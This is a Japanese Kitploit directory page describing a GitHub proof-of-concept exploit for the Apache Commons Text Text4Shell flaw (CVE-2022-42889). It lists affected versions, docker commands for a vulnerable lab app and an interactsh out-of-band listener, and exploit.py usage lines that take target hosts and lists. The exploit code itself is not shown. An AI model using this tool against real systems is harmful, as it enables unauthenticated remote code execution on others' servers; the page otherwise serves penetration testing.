Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
text4shell-exploit — CVE-2022-42889 - Text4Shellエクスプロイト | Kitploit
ツール/GitHubGitHub/gokul-ramesh/text4shell-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubgokul-ramesh/text4shell-exploit

text4shell-exploit

CVE-2022-42889 - Text4Shellエクスプロイト

リポジトリを見る
133年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Text4shell-exploit

これは、Apache Commons Text [CVE-2022-42889] の脆弱性を悪用するProof of Conceptです。

影響を受けるバージョン: 1.5.0 から (1.10.0 は含まない)

影響

この脆弱性が悪用されると、認証されていない攻撃者が脆弱な資産上で任意のコードを実行できる可能性があります。

PoCを検証するための脆弱なアプリケーション

@securekomodo によって開発されたアプリケーションが こちら に添付されています。

Docker

このアプリケーションはdocker-registryからもロードできます。

root@kitploit:~
docker run -p 8080:8080 gokul2/text4shell-poc:latest

これでアプリケーションは localhost:8080 で利用可能になります。

検証

任意のコマンド実行を検証するために、OOBインタラクションをキャプチャするツールである interactsh(@projectdiscovery 作成)を使用します。

Interactsh-clientのセットアップ

実際のエクスプロイトを実行する前に、interactshクライアントをセットアップしてください。

root@kitploit:~
docker run projectdiscovery/interactsh-client:latest

アプリケーション起動後に表示されるドメインをメモしてください。

root@kitploit:~
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro

使い方

root@kitploit:~
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]

確認

エクスプロイトを検証するには、interactshクライアントのログを確認してください。

ツールをダウンロード